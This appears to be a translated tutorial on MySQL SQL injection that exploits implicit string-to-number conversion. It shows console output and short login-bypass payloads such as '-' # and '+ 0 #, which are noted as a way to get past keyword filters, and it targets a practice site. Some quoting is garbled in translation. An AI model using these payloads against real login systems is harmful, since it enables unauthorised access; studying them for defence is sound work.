Ref: [Abusing MySQL string arithmetic for tiny SQL Injections]
Let's look at this scenario first.
The table structure is as follows:
mysql> desc admin;+----------+--------------+------+-----+---------+----------------+| Field | Type | Null | Key | Default | Extra |+----------+--------------+------+-----+---------+----------------+| id | mediumint(9) | NO | PRI | NULL | auto_increment || name | char(32) | NO | UNI | NULL | || password | char(32) | NO | UNI | NULL | |+----------+--------------+------+-----+---------+----------------+3 rows in set (0.00 sec)
Run select * from admin; to return all records.
+----+--------+----------------------------------+| id | name | password |+----+--------+----------------------------------+| 1 | admin | c6dabaeeb05f2bf8690bab15e3afb022 || 2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 || 4 | n00b | ff80e8508d39047460921792273533a4 |+----+--------+----------------------------------+3 rows in set (0.00 sec)
Execute select * from admin where name = ";, no matching records.
mysql> select * from admin where name = '';Empty set (0.00 sec)
Then we will execute select * from admin where name = "-";
+----+--------+----------------------------------+| id | name | password |+----+--------+----------------------------------+| 1 | admin | c6dabaeeb05f2bf8690bab15e3afb022 || 2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 || 4 | n00b | ff80e8508d39047460921792273533a4 |+----+--------+----------------------------------+3 rows in set, 3 warnings (0.00 sec)
We can see that all records are successfully returned, but there are three warnings. Let's take a look at the warning information:
mysql> show warnings;+---------+------+------------------------------------------| Level | Code | Message+---------+------+------------------------------------------| Warning | 1292 | Truncated incorrect DOUBLE value: 'admin| Warning | 1292 | Truncated incorrect DOUBLE value: 'pnig0s| Warning | 1292 | Truncated incorrect DOUBLE value: 'n00b+---------+------+------------------------------------------3 rows in set (0.00 sec) www.2cto.com
It indicates that the DOUBLE value 'admin' is truncated. This type of warning is generated when numeric values are used in a string column.
Select "-" is executed separately.
mysql> select ''-'';+-------+| ''-'' |+-------+| 0 |+-------+1 row in set (0.00 sec)
0 is returned, that is, the name sub-segment of each row we query will be compared with 0. This will trigger a type conversion, and the Conversion Result of the name field must be 0:
mysql> select CAST((select name from admin limit 1,1) as DECIMAL);+-----------------------------------------------------+| CAST((select name from admin limit 1,1) as DECIMAL) |+-----------------------------------------------------+| 0 |+-----------------------------------------------------+1 row in set, 1 warning (0.00 sec)
Therefore, the where statement constitutes an equal condition, where 0 = "-", and the record is returned.
SQL Injection scenario:Http://www.sqlzoo.net/hack/
If we want to bypass login verification, we have provided a traditional tips: the username and password are both 'or "='
Such logic and bypass methods are very common and will not be explained here.
This discovery technique allows you to use a very sophisticated method and avoid using SQL keywords to bypass logon.
Enter '-' # In the name sub-segment and leave the password blank to bypass logon verification.
Except "-", other operators "+", "*", and "^" have the same effect. Continue the test. We found that we only need to construct the condition where the query result is 0 when the single quotation marks are closed.
mysql> select ''/1;+------+| ''/1 |+------+| 0 |+------+1 row in set (0.00 sec)
Similar to "+ 0,"-0, "* 0," ^ 0.
In the injection environment we just used the following simple payload to bypass login authentication:
'+ 0 #,'/1 #, '^ 0,'-0 #, and so on.
With this feature, you can use this method to filter the SQL keywords in the injection statement.